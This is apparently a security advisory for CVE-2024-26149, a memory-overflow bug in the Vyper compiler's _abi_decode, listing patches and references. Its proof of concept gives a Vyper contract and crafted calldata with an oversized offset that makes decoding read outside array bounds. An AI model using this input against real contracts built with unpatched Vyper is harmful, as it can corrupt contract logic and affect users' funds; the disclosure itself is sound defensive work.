Vyper's `_abi_decode` vulnerable to Memory Overflow
GHSA-9p8r-4xp4-gw5w · CVE-2024-26149 · PYSEC-2024-164
Published · Modified
Description
Summary
If an excessively large value is specified as the starting index for an array in _abi_decode, it can cause the read position to overflow. This results in the decoding of values outside the intended array bounds, potentially leading to bugs in contracts that use arrays within _abi_decode. The advisory has been assigned low severity, because it is only observable if there is a memory write between two invocations of abi_decode on the same input.
Proof of Concept
event Pwn:
pass
@external
def f(x: Bytes[32 * 3]):
a: Bytes[32] = b"foo"
y: Bytes[32 * 3] = x
decoded_y1: Bytes[32] = _abi_decode(y, Bytes[32])
a = b"bar"
decoded_y2: Bytes[32] = _abi_decode(y, Bytes[32])
if decoded_y1 != decoded_y2:
log Pwn()
Sending the following calldata results in Pwn being emitted.
0xd45754f8
0000000000000000000000000000000000000000000000000000000000000020
0000000000000000000000000000000000000000000000000000000000000060
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffa0
Patches
Patched in https://github.com/vyperlang/vyper/pull/3925, https://github.com/vyperlang/vyper/pull/4091, https://github.com/vyperlang/vyper/pull/4144, https://github.com/vyperlang/vyper/pull/4060.
References
- WEB https://github.com/vyperlang/vyper/security/advisories/GHSA-9p8r-4xp4-gw5w
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-26149
- WEB https://github.com/vyperlang/vyper/pull/3925
- WEB https://github.com/vyperlang/vyper/pull/4060
- WEB https://github.com/vyperlang/vyper/pull/4091
- WEB https://github.com/vyperlang/vyper/pull/4144
- WEB https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2024-164.yaml
- PACKAGE https://github.com/vyperlang/vyper
Ready to move
Start Securing
Free, no credit card | First findings in minutes